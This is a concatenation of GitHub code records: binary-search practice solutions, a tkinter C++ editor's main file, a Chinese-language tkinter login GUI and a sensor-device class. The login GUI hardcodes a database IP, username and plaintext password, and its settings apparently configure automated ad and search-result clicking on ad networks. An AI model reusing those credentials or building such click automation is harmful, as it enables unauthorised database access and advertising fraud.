check if k in present in this range\n\t\t\tif arr[low] <= k <= arr[mid]:\n\t\t\t\thigh = mid - 1\n\t\t\telse:\n\t\t\t\tlow = mid + 1\n\t\telse:\n\t\t\t### second part is sorted\n\n\t\t\tif arr[mid] <= k <= arr[high]:\n\t\t\t\tlow = mid + 1\n\t\t\telse:\n\t\t\t\thigh = mid - 1\n\t\t\t\n\t\n\treturn -1\n\n# https://www.codingninjas.com/studio/problems/search-in-a-rotated-sorted-array-ii_7449547?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef searchInARotatedSortedArrayII(A : List[int], key : int) -> bool:\n \n low = 0\n high = len(A) - 1\n\n while low <= high:\n\n mid = low + (high - low) // 2\n\n if A[mid] == key:\n return True\n\n ### to handle duplicates \n if A[mid] == A[low] == A[high]:\n low += 1 \n high -= 1\n continue\n\n ####find the sorted half\n if A[low] <= A[mid]: ### fisrt part is sorted\n\n if A[low] <= key <= A[mid]:\n high = mid - 1\n else:\n low = mid + 1\n else:\n\n if A[mid] <= key <= A[high]:\n low = mid + 1\n else:\n high = mid - 1\n\n return False\n\n# https://www.codingninjas.com/studio/problems/rotated-array_1093219?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef findMin(arr: [int]):\n\n n = len(arr)\n low = 0\n high = n - 1\n mini = float('inf')\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[low] <= arr[mid]:\n mini = min(mini, arr[low])\n low = mid + 1\n else:\n mini = min(mini, arr[mid])\n high = mid - 1\n\n return mini\n\n# https://www.codingninjas.com/studio/problems/rotation_7449070?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef findMin(arr: [int]):\n\n n = len(arr)\n low = 0\n high = n - 1\n mini = float('inf')\n idx = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[low] <= arr[mid]:\n # mini = min(mini, arr[low])\n if mini > arr[low]:\n mini = arr[low]\n idx = low\n\n low = mid + 1\n else:\n # mini = min(mini, arr[mid])\n if mini > arr[mid]:\n mini = arr[mid]\n idx = mid\n\n high = mid - 1\n\n return idx\n\ndef findKRotation(arr : [int]) -> int:\n\n return findMin(arr)\n\n# https://www.codingninjas.com/studio/problems/unique-element-in-sorted-array_1112654?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef singleNonDuplicate(arr):\n \n ### not considering the 0th and nth index \n ### rule arr[i] != arr[i-1] or arr[i] != arr[i+1] this is the single number.\n ### elimination rule:\n ### using odd, even pos\n ### before the single number (ans), we will follow the (even, odd) trend.\n ### after the single number (ans), we will follow the (odd, even) trend. \n\n ### if it only has one element\n if len(arr) == 1: return arr[0]\n\n ### handling it 0th and nth case. \n if arr[0] != arr[1]: return arr[0]\n\n n = len(arr)\n\n if arr[n-1] != arr[n-2]: return arr[n-1]\n\n low = 1\n high = n - 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ##check if single number\n if arr[mid] != arr[mid + 1] and arr[mid] != arr[mid - 1]:\n return arr[mid]\n ##if we are in left half we eliminate it\n ##left half follows the order even, odd\n if (mid % 2 == 0 and arr[mid] == arr[mid + 1]) or (mid % 2 != 0 and arr[mid] == arr[mid-1]):\n ## in the left half\n low = mid + 1\n else:\n ### else I am in right half\n high = mid - 1\n\n return -1\n\n\n# https://www.codingninjas.com/studio/problems/find-peak-element_1081482?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef findPeakElement(arr: [int]) -> int:\n ####similar to single number\n\n ###peak number condition arr[i] > arr[i + 1] and arr[i] > arr[i - 1]\n n = len(arr)\n\n ### handle edge cases\n ### case 1: only one element\n if n == 1: return 0\n\n ### case 2: 0th index is a peak element\n if arr[0] > arr[1]: return 0\n\n ### case 3: nth index is a peak element\n if arr[n-1] > arr[n-2]: return n-1\n\n low = 1\n high = n - 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] > arr[mid-1] and arr[mid] > arr[mid+1]:\n return mid\n\n ###check if your at the descending or the ascending part.\n if arr[mid] > arr[mid-1]:\n ###in the descending part\n low = mid + 1\n else:\n ### in the ascending part\n high = mid - 1\n\n return -1\n\n# https://www.codingninjas.com/studio/problems/square-root-integral_893351?leftPanelTab=1&utm_medium=website&utm_campaign=a_zcoursetuf\ndef floorSqrt(n):\n # write your code logic here .\n low = 1\n high = n\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if mid*mid <= n:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n\n return ans\n\nn= int(input())\nprint(floorSqrt(n))\n\n# https://www.codingninjas.com/studio/problems/nth-root-of-m_1062679?utm_source=striver&utm_medium=website&utm_campaign=codestudio_a_zcourse&leftPanelTab=0\n###brute force approach for python\ndef NthRoot(n: int, m: int) -> int:\n ### range should go from 1 to n\n\n for i in range(1, m):\n\n val = i ** n\n\n if val == m:\n return i\n elif val > m:\n return -1\n\ndef NthRoot(n: int, m: int) -> int:\n ### range should go from 1 to n\n \n # for i in range(1, m):\n\n # val = i ** n \n \n # if val == m:\n # return i\n # elif val > m:\n # return -1\n\n\n low = 1\n high = m\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = mid ** n\n\n if val == m:\n return mid\n elif val > m:\n high = mid - 1\n else:\n low = mid + 1\n\n return -1\n\n\n# https://www.codingninjas.com/studio/problems/minimum-rate-to-eat-bananas_7449064?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\nimport math\ndef total_hours(a, m):\n\n total_time = 0\n\n for i in a:\n if i <= m:\n total_time += 1\n else:\n total_time += int(math.ceil(i/m))\n \n return total_time\n\n# ###brute force apporach\n# def minimumRateToEatBananas(v: [int], h: int) -> int:\n \n\n# for m in range(1, max(v)+1):\n\n# t = total_hours(v, m)\n\n# if t <= h:\n# return m\n\n\ndef minimumRateToEatBananas(v: [int], h: int) -> int:\n \n\n low = 1\n high = max(v)\n ans = high\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if total_hours(v, mid) <= h:\n ans = mid \n high = mid - 1\n else:\n low = mid + 1\n \n return ans\n\n\n\n\nfrom typing import List\n\n# def total_bouquets(arr, k, days, m):\n\n# total = 0\n# curr = 0\n\n# for i in arr:\n \n# if i <= days:\n# curr += 1\n# else:\n# curr = 0\n\n# if curr == k:\n# total += 1\n# curr = 0\n\n# if total == m:\n# return True\n\n# return False\n\n\n# https://www.codingninjas.com/studio/problems/rose-garden_2248080?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef total_bouquets(arr, k, days, m):\n\n total = 0\n curr = 0\n\n for i in arr:\n\n if i <= days:\n curr += 1\n else:\n curr = 0\n\n if curr == k:\n total += 1\n curr = 0\n if total == m:\n return total\n\n return total\n\ndef roseGarden(arr: List[int], k: int, m: int):\n\n # for days in range(1, max(arr) + 1):\n\n # if total_bouquets(arr, k, days, m):\n # return days\n\n low = 1\n high = max(arr)\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n # print(mid)\n\n val = total_bouquets(arr, k, mid, m)\n\n if val >= m:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/smallest-divisor-with-the-given-limit_1755882?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\nfrom os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\ndef calculate_sum(arr, divisor):\n\n ans = 0\n for i in arr:\n ans += ceil(i/divisor)\n return int(ans)\n\ndef smallestDivisor(arr: [int], limit: int) -> int:\n \n \n # for i in range(1, max(arr) + 1):\n\n # val = calculate_sum(arr, i)\n\n # if val <= limit:\n # return i\n\n # return -1\n\n low = 1\n high = max(arr)\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = calculate_sum(arr, mid)\n\n if val <= limit:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n\n# https://www.codingninjas.com/studio/problems/capacity-to-ship-packages-within-d-days_1229379?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\nfrom os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\ndef calculate_time(weights, cap):\n\n load = 0\n days = 1\n\n for i in weights:\n if load + i > cap:\n days += 1\n load = i\n else:\n ##can load/take the package on the same day.\n load += i\n\n return days\n\ndef leastWeightCapacity(weights, d):\n \n # for cap in range(max(weights), sum(weights) + 1):\n\n # days = calculate_time(weights, cap)\n\n # # print(days, cap)\n\n # if days <= d:\n # return cap\n \n # return -1\n\n low = max(weights)\n high = sum(weights)\n ans = -1\n\n while low <= high:\n\n #possiable capacity \n mid = (low + high) // 2\n\n days = calculate_time(weights, mid)\n\n if days <= d:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n \n return ans\n\n\n# https://www.codingninjas.com/studio/problems/kth-missing-element_893215?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\nfrom typing import *\n\ndef missingK(vec: List[int], n: int, k: int) -> int:\n # Write your code here.\n \n ### TC: O(N)\n ### SC: O(N) becz of the set.\n\n # vec = set(vec)\n\n # for i in range(1, max(vec) + 1):\n\n # if i not in vec:\n # k -= 1\n\n # if k == 0:\n # return i \n\n # return -1\n\n ###binary search in applied on the index\n\n low = 0\n high = n-1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n missing = vec[mid] - mid - 1\n\n if missing < k:\n low = mid + 1\n else:\n high = mid - 1\n\n return k + high + 1\n\n\n# https://www.codingninjas.com/studio/problems/aggressive-cows_1082559?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef can_place(stalls, k, dist):\n\n last = stalls[0]\n count = 1\n\n for curr in stalls[1:]:\n\n if curr - last >= dist:\n count += 1\n last = curr\n\n if count >= k:\n return True\n\n return False \n\n\ndef aggressiveCows(stalls, k):\n\n stalls.sort()\n\n min_range = 1\n max_range = max(stalls) - min(stalls)\n\n # for dist in range(min_range, max_range+1):\n\n # ###check if its possiable to place k cows in stalls given dist \n # if not can_place(stalls, k, dist):\n # return dist - 1\n \n # return max_range \n\n low = min_range\n high = max_range \n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = can_place(stalls, k, mid)\n\n ###if true then this is a possiable answer \n if val:\n ans = max(mid, ans)\n low = mid + 1\n else:\n high = mid - 1\n \n return ans\n\n\n# https://www.codingninjas.com/studio/problems/allocate-books_1090540?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef countStudents(arr, pages):\n n = len(arr) # size of array\n students = 1\n pagesStudent = 0\n for i in range(n):\n if pagesStudent + arr[i] <= pages:\n # add pages to current student\n pagesStudent += arr[i]\n else:\n # add pages to next student\n students += 1\n pagesStudent = arr[i]\n return students\n\ndef findPages(arr, n, m):\n # book allocation impossible\n if m > n:\n return -1\n\n low = max(arr)\n high = sum(arr)\n\n # for pages in range(low, high + 1):\n # if countStudents(arr, pages) == m:\n # return pages\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = countStudents(arr, mid)\n\n\n if val > m:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n# https://www.codingninjas.com/studio/problems/largest-subarray-sum-minimized_7461751?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef split_array(a, k, limit):\n\n prev = 0\n splits = 1\n\n for i in a:\n\n if i + prev <= limit:\n prev += i\n else:\n ###split\n splits += 1\n prev = i\n\n return splits\n\ndef largestSubarraySumMinimized(a: [int], k: int) -> int:\n\n\n low = max(a)\n high = sum(a)\n\n # for i in range(low, high+1):\n\n # if split_array(a, k, i) == k:\n # return i\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = split_array(a, k, mid)\n\n if val > k:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n# https://www.codingninjas.com/studio/problems/painter-s-partition-problem_1089557?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef painters_requied(boards, max_load):\n\n painters = 1\n load = 0\n\n for i in boards:\n\n if i + load <= max_load:\n load += i\n else:\n ###move to next painter\n painters += 1\n load = i\n\n return painters\n\n\ndef findLargestMinDistance(boards:list, k:int):\n \n low_limit = max(boards)\n max_limit = sum(boards)\n\n # for max_load in range(low_limit, max_limit):\n\n # val = painters_requied(boards, max_load)\n\n # if val <= k:\n # return max_load\n \n # return max_limit ##if k == 1\n\n \n low = low_limit\n high = max_limit\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = painters_requied(boards, mid)\n\n if val > k:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n\ndef binary_search(arr, target):\n\n low = 0\n high = len(arr) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] == target:\n return mid \n elif arr[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n \n return -1\n\ndef searchMatrix(mat: [[int]], target: int) -> bool:\n # Write your code here.\n ### TC: O(N * log(M))\n ### SC: (1)\n # for col_arr in mat:\n\n # if col_arr[0] <= target <= col_arr[-1]:\n # ###do search\n # val = binary_search(col_arr, target) \n\n # if val != -1:\n # return True \n \n # return False\n\n ###approach\n\n n = len(mat)\n m = len(mat[0])\n\n low = 0\n high = (m * n) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ###need to get row index and col index \n col = mid % m\n row = mid // m\n \n if mat[row][col] == target:\n return True \n elif mat[row][col] > target:\n high = mid - 1\n else:\n low = mid + 1\n \n return False\n\n\n# https://www.codingninjas.com/studio/problems/median-of-a-row-wise-sorted-matrix_1115473?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\ndef lower_then(arr, x):\n\n low = 0\n high = len(arr) -1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] <= x:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n \n \n return ans + 1\n\n\ndef median(matrix: [[int]], m: int, n: int) -> int:\n \n ###brute force \n ### TC: O(NXM * log(N*M))\n ### SC: O(NXM)\n\n ### x is mxn\n # ls = [] #O(x)\n \n # ###O(x)\n # for i in matrix:\n # ls.extend(i)\n \n # ls.sort() ##xlogx\n\n # return ls[m*n//2]\n \n ####binary search \n # low = min([matrix[i][0] for i in range(n)])\n # high = max([matrix[i][m-1] for i in range(n)])\n\n n = len(matrix)\n m = len(matrix[0])\n\n low = 1\n high = 10 ** 9\n median_index = (n * m) // 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ###count the number of elements <= mid\n ###get all elements <= mid \n cnt = 0\n for i in range(n):\n cnt += lower_then(matrix[i], mid)\n\n if cnt <= median_index:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n","repo_name":"evilc3/dsa","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":23616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17822821318","text":"# Add \"C:\\MinGW\\bin\" to path\n\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import messagebox\nimport tkinter as tk\nimport pickle\n\nfrom constants.settings import settings, ChangeSettings\nfrom runnable.runnable import RunnableText\nfrom constants.bettertk import BetterTk, BetterTkSettings\nfrom constants.cpptext import CPPText\nfrom constants.notebook import Notebook\nfrom file_explorer import Explorer\n\n\nSAMPLE_CODE = \"\"\"\n#include \n\nusing namespace std;\n\nint main(){\n cout << \"Hello World\\\\n\";\n return 0; // this is a comment\n}\n\"\"\"[1:-1]\n\n\nFONT = settings.editor.font.get()\nHEIGHT = settings.editor.height.get()\nWIDTH = settings.editor.width.get()\nBG_COLOUR = settings.editor.bg.get()\nFG_COLOUR = settings.editor.fg.get()\nTITLEBAR_COLOUR = settings.editor.titlebar_colour.get()\nINACTIVETITLE_BG = settings.editor.inactivetitle_bg.get()\n\n\nclass App:\n def __init__(self):\n settings = BetterTkSettings(theme=\"dark\")\n settings.config(active_titlebar_bg=BG_COLOUR, bg=BG_COLOUR,\n active_titlebar_fg=TITLEBAR_COLOUR,\n separator_colour=FG_COLOUR,\n inactive_titlebar_bg=INACTIVETITLE_BG)\n self.root = BetterTk(settings=settings)\n self.root.iconbitmap(\"sprites/logo/logo1.ico\")\n self.root.bind_all(\"\", self.change_settings)\n self.root.title(\"Bismuth 184\")\n self.root.close_button.config(command=self.close_app)\n\n pannedwindow = tk.PanedWindow(self.root, sashwidth=4,\n orient=\"horizontal\")\n pannedwindow.pack(fill=\"both\", expand=True)\n\n self.explorer_window = tk.Frame(pannedwindow, bd=0,\n highlightthickness=0)\n # self.explorer_window.pack(fill=\"both\", expand=True, side=\"left\")\n\n self.explorer = Explorer(self.explorer_window, width=200,\n height=2600)\n self.explorer.pack(fill=\"both\", expand=True, side=\"bottom\")\n self.explorer.resize(\"fit_width\")\n self.explorer.bind_all(\"<>\", self.open_file_explorer)\n\n self.explorer_buttons_frame = tk.Frame(self.explorer_window, bd=0,\n highlightthickness=0)\n self.explorer_buttons_frame.pack(fill=\"x\", side=\"top\")\n self.populate_explorer_buttons()\n\n self.notebook = Notebook(pannedwindow)\n pannedwindow.add(self.explorer_window, sticky=\"news\")\n pannedwindow.add(self.notebook, sticky=\"news\", width=780, height=690)\n # self.notebook.pack(fill=\"both\", expand=True, side=\"right\")\n self.tabs = {}\n\n self.notebook._delete_tab = self.close_tab\n self.notebook._plus_pressed = self.add_tab\n self.notebook._set_active = self.set_active_tab\n\n try:\n with open(\"state.state\", \"rb\") as file:\n state = pickle.loads(file.read())\n self.open_app(state)\n except FileNotFoundError:\n self.add_tab()\n\n def open_file_explorer(self, event):\n file = event.widget.item\n idx = self.add_tab()\n wrapper = self.tabs[idx][1]\n wrapper._open(file.full_path)\n wrapper.text.update_idletasks()\n wrapper.text.after(500, wrapper.text.see_insert)\n\n def add_folder_explorer(self):\n full_path = askdirectory(master=self.root)\n # Check if user canceled\n if len(full_path) > 0:\n self.explorer.add(full_path)\n\n def remove_folder_explorer(self):\n selected = self.eplorer.explorer.selected\n if selected is not None:\n if selected in self.explorer.explorer.tree.children:\n self.explorer.explorer.remove(selected)\n self.explorer.select(None)\n\n def populate_explorer_buttons(self):\n b1 = tk.Button(self.explorer_buttons_frame, bg=BG_COLOUR, fg=FG_COLOUR,\n command=self.add_folder_explorer, text=\"Add folder\")\n b2 = tk.Button(self.explorer_buttons_frame, bg=BG_COLOUR,\n fg=FG_COLOUR, command=self.remove_folder_explorer,\n text=\"Remove folder\")\n b1.pack(fill=\"x\", expand=True, side=\"left\")\n b2.pack(fill=\"x\", expand=True, side=\"left\")\n\n def set_active_tab(self, idx):\n try:\n self.tabs[idx][0].focus()\n self.notebook.set_active(idx)\n except KeyError:\n pass\n\n def ask_close_tab(self, idx, event=None):\n text_widget, text_widget_wrapper = self.tabs[idx]\n if not text_widget_wrapper.is_saved():\n filename = text_widget_wrapper.file_name\n msg = \"Do you want to save the file \\\"%s\\\"?\" % filename\n result = messagebox.askyesnocancel(\"Exit\", msg, default=\"yes\")\n if result is None:\n return \"break\"\n elif result:\n text_widget_wrapper.save()\n\n def close_tab(self, idx=None, event=None):\n if idx is None:\n idx = self.notebook.current_tab\n if self.ask_close_tab(idx) == \"break\":\n return \"break\"\n else:\n self.notebook.delete_tab(idx, event)\n del self.tabs[idx]\n\n def add_tab(self, state=None):\n frame = tk.Frame(self.notebook, bd=0, highlightthickness=0)\n idx = self.notebook.add(frame, text=\"Untitled\")\n text_widget = CPPText(frame, bg=BG_COLOUR, fg=FG_COLOUR,\n font=FONT, height=HEIGHT, width=WIDTH)\n text_widget.pack(fill=\"both\", expand=True)\n text_widget.insert(\"end\", SAMPLE_CODE)\n text_widget_wrapper = RunnableText(text_widget, idx,\n self.change_tab_text,\n self.ask_close_tab)\n self.tabs.update({idx: (text_widget, text_widget_wrapper)})\n if state is not None:\n text_widget_wrapper.set_state(state)\n self.notebook._set_active(self.notebook.next_idx - 1)\n return idx\n\n def change_tab_text(self, idx, name):\n self.notebook.rename(idx, name)\n\n def close_app(self):\n # Save the state\n state = {\"this\": self.get_state()}\n for idx, (text_widget, text_widget_wrapper) in self.tabs.items():\n state.update({\"tab %i\" % idx: text_widget_wrapper.get_state()})\n with open(\"state.state\", \"wb\") as file:\n file.write(pickle.dumps(state))\n\n # Close the notebook and root\n self.notebook.destroy()\n self.root.destroy()\n\n def open_app(self, state):\n this_state = state.pop(\"this\")\n self.set_state(this_state)\n for key, value in state.items():\n self.add_tab(state=value)\n\n def get_state(self):\n return {\"explorer\": self.explorer.get_state(),\n \"explorer_width\": self.explorer.master_frame.winfo_width()}\n\n def set_state(self, state):\n explorer_state = state.pop(\"explorer\")\n self.explorer.set_state(explorer_state)\n width = state.pop(\"explorer_width\", 200)\n self.explorer.config(width=width)\n self.explorer.resize(\"fit_width\")\n if len(state) > 0:\n print(\"[App] Didn't handle this part of `state`:\", state)\n\n def change_settings(self, event):\n changer = ChangeSettings(self.root)\n\n def mainloop(self):\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n","repo_name":"TheLizzard/Bismuth-184","sub_path":"src/main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"24733724623","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nfrom tkinter import messagebox\nimport tkinter as tk\nimport pymysql\nimport logging\ndef log():\n logger = logging.getLogger('服务端')\n logger.setLevel(logging.INFO)\n fmt = logging.Formatter('%(name)s-->%(asctime)s-->%(message)s')\n fh = logging.FileHandler('ServerLog.txt', encoding='utf-8')\n\n sh = logging.StreamHandler()\n sh.setFormatter(fmt)\n fh.setFormatter(fmt)\n logger.addHandler(fh)\n logger.addHandler(sh)\n return logger\n\nroot = tk.Tk()\nroot.title(\"登陆器测试\")\nroot.geometry(\"550x340\")\n\n#LabelFrame 1 登陆及帐户信息\nlf1 = tk.LabelFrame(root, text=\"登陆信息\", width=240, height=150)\nlf1.place(x=10, y=10)\n\n#登陆事件\ndef usr_login():\n lg = log()\n lg.info(\"您点击了登陆按钮!\")\n\n\ntk.Label(lf1, text=\"用户名:\").place(x=5, y=5)\ntk.Label(lf1, text=\"密 码:\").place(x=5, y=40)\ntk.Entry(lf1, text=\"\", width=20).place(x=75, y=5)\ntk.Entry(lf1, text=\"\", width=20, show=\"*\").place(x=75, y=40)\ntk.Button(lf1, text=\"登陆\", width=8, command=usr_login).place(x=30, y=80)\ntk.Button(lf1, text=\"注册\", width=8).place(x=140, y=80)\n\n\n\n#LabelFrame 2 日志信息显示\nlf2 = tk.LabelFrame(root, text=\"日志信息\", width=240, height=155)\nlf2.place(x=10, y=170)\n\n#LabelFrame 3\nlf3 = tk.LabelFrame(root, text=\"设置1\", width=270, height=150)\nlf3.place(x=270, y=10)\ntk.Label(lf3, text=\"联盟选择:\", width=8, fg=\"blue\").place(x=5, y=5)\nssp = tk.IntVar()\nssp.set(3)\ntk.Radiobutton(lf3, text=\"搜狗联盟\", variable=ssp, value=1).place(x=5, y=30)\ntk.Radiobutton(lf3, text=\"百度联盟\", variable=ssp, value=2).place(x=98, y=30)\ntk.Radiobutton(lf3, text=\"360联盟\", variable=ssp, value=3).place(x=188, y=30)\n\ntk.Label(lf3, text=\"词库选择:\", width=8, fg=\"blue\").place(x=5, y=70)\nkeyword = tk.IntVar()\nkeyword.set(3)\ntk.Radiobutton(lf3, text=\"词库3\", variable=keyword, value=1).place(x=5, y=95)\ntk.Radiobutton(lf3, text=\"词库2\", variable=keyword, value=2).place(x=98, y=95)\ntk.Radiobutton(lf3, text=\"词库1\", variable=keyword, value=3).place(x=188, y=95)\n\n#LabelFrame 4\nlf4 = tk.LabelFrame(root, text=\"设置2\", width=270, height=120)\nlf4.place(x=270, y=170)\n\nadsclick1 = tk.IntVar() #推广链接点击个数1\nadsclick1.set(\"3\")\nadsclick2 = tk.IntVar() #推广链接点击个数2\nadsclick2.set(\"3\")\ntk.Label(lf4, text=\"推广链接点击个数:\").place(x=5, y=0)\ntk.Entry(lf4, textvariable=adsclick1, width=3).place(x=120, y=0)\ntk.Label(lf4, text=\"~ (随机)\").place(x=145, y=0)\ntk.Entry(lf4, textvariable=adsclick2, width=3).place(x=160, y=0)\n\nsearchclick1 = tk.IntVar() #搜索结果点击个数1\nsearchclick1.set(\"1\")\nsearchclick2 = tk.IntVar() #搜索结果点击个数2\nsearchclick2.set(\"3\")\ntk.Label(lf4, text=\"搜索结果点击个数:\").place(x=5, y=25)\ntk.Entry(lf4, textvariable=searchclick1, width=3).place(x=120, y=25)\ntk.Label(lf4, text=\"~ (随机)\").place(x=145, y=25)\ntk.Entry(lf4, textvariable=searchclick2, width=3).place(x=160, y=25)\n\ndelaytime1 = tk.IntVar() #浏览窗口停留时间1\ndelaytime1.set(\"60\")\ndelaytime2 = tk.IntVar() #浏览窗口停留时间2\ndelaytime2.set(\"300\")\ntk.Label(lf4, text=\"浏览窗口停留时间:\").place(x=5, y=50)\ntk.Entry(lf4, textvariable=delaytime1, width=3).place(x=120, y=50)\ntk.Label(lf4, text=\"~ (秒)\").place(x=145, y=50)\ntk.Entry(lf4, textvariable=delaytime2, width=3).place(x=160, y=50)\n\ntimeryear = tk.IntVar() #定时 年\ntimeryear.set(\"2018\")\ntimermonth = tk.IntVar() #定时 月\ntimermonth.set(\"3\")\ntimerday = tk.IntVar() #定时 日\ntimerday.set(\"4\")\ntimerhour = tk.IntVar() #定时 时\ntimerhour.set(\"8\")\ntimerbranch = tk.IntVar() #定时 分\ntimerbranch.set(\"0\")\ntk.Label(lf4, text=\"定时时间: - - : (定时)\").place(x=5, y=75)\ntk.Entry(lf4, textvariable=timeryear, width=4).place(x=79, y=75)\ntk.Entry(lf4, textvariable=timermonth, width=2).place(x=120, y=75)\ntk.Entry(lf4, textvariable=timerday, width=2).place(x=148, y=75)\ntk.Entry(lf4, textvariable=timerhour, width=2).place(x=172, y=75)\ntk.Entry(lf4, textvariable=timerhour, width=2).place(x=200, y=75)\n# 保存\ntk.Button(root, text=\"保存\", width=6).place(x=270, y=295)\ntk.Button(root, text=\"开始\", width=6).place(x=344, y=295)\ntk.Button(root, text=\"暂停\", width=6).place(x=415, y=295)\ntk.Button(root, text=\"停止\", width=6).place(x=487, y=295)\n# 组件隐藏\n# lf1.pack_forget()\nroot.mainloop()\n\n\n# 打开数据库连接\ndb = pymysql.connect(\"122.114.13.199\", \"360Click\", \"LOVElove12354\", \"360Click\", charset='utf8')\n\n#使用cursor()方法创建一个游标对象\ncursor = db.cursor()\n#使用execute()方法执行SQL语句\ncursor.execute(\"SELECT * FROM python_user\")\n\n#使用fetall()获取全部数据\ndata = cursor.fetchall()\n\n#打印获取到的数据\nprint(data)\n\n#关闭游标和数据库的连接\ncursor.close()\ndb.close()\n","repo_name":"falwiw/PycharmProjects","sub_path":"Other - 副本/AdslClick/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42993810463","text":"import numpy as np\n\nclass SensorDevice(object):\n '''\n classdocs\n '''\n DEVICE_PREFIX = \"hci\"\n DEC_PRECISION = 8\n \n cluster_id = \"\"\n sensor_id = \"\"\n device_name = \"\"\n device_num = -1\n device_type = \"\"\n device_bus = \"\"\n mac_address = \"\"\n is_up = False\n status = \"\"\n degrees_turned = 0\n distance_from_base = 0\n height_from_ground = 0\n \n _params = None\n _x_set = False\n _y_set = False\n _x = 0.0\n _y = 0.0\n\n @staticmethod\n def create_from_data_list(data_list, params):\n rval = SensorDevice(params)\n for ln in data_list:\n vals = ln.split(\" \")\n if (ln[0:len(SensorDevice.DEVICE_PREFIX)] == SensorDevice.DEVICE_PREFIX):\n #device Line\n subvals = vals[0].split(\":\")\n rval.device_name = subvals[0]\n rval.device_num = int(rval.device_name[len(SensorDevice.DEVICE_PREFIX):len(rval.device_name)])\n rval.device_type = vals[1]\n rval.device_bus = vals[4]\n elif (ln[0:2] == \"BD\"):\n rval.mac_address = vals[2]\n elif ((ln[0:2] == \"UP\") or (ln[0:4] == \"DOWN\")):\n if (vals[0] == \"UP\"):\n rval.is_up = True\n else:\n rval.is_up = False\n \n return rval\n \n @staticmethod\n def cluster_from_sensor_id(sensor_id:str):\n rval = ''\n if (sensor_id == None):\n return rval\n elif(sensor_id == ''):\n return rval\n indx = sensor_id.find('_')\n rval = sensor_id[0:indx]\n return rval\n \n @property\n def X(self):\n if (not self._x_set):\n an = np.deg2rad(self.degrees_turned - 90)\n self._x = round(self.distance_from_base * np.cos(an),self.DEC_PRECISION)\n self._x_set = True\n return self._x\n \n @property\n def Y(self):\n if (not self._y_set):\n an = np.deg2rad(self.degrees_turned + 90)\n self._y = round(self.distance_from_base * np.sin(an), self.DEC_PRECISION)\n self._y_set = True\n return self._y\n \n @property\n def Z(self):\n return self.height_from_ground\n \n def to_bytes(self, delimiter:str):\n return self.cluster_id + \\\n delimiter + \\\n self.sensor_id + \\\n delimiter + \\\n self.device_name + \\\n delimiter + \\\n str(self.device_num) + \\\n delimiter + \\\n self.device_type + \\\n delimiter + \\\n self.device_bus + \\\n delimiter + \\\n self.mac_address + \\\n delimiter + \\\n str(self.is_up) + \\\n delimiter + \\\n self.status + \\\n delimiter + \\\n str(self.degrees_turned) + \\\n delimiter + \\\n str(self.distance_from_base) + \\\n delimiter + \\\n str(self.height_from_ground)\n\n def __init__(self, params):\n '''\n Constructor\n '''\n self._params = params\n \n 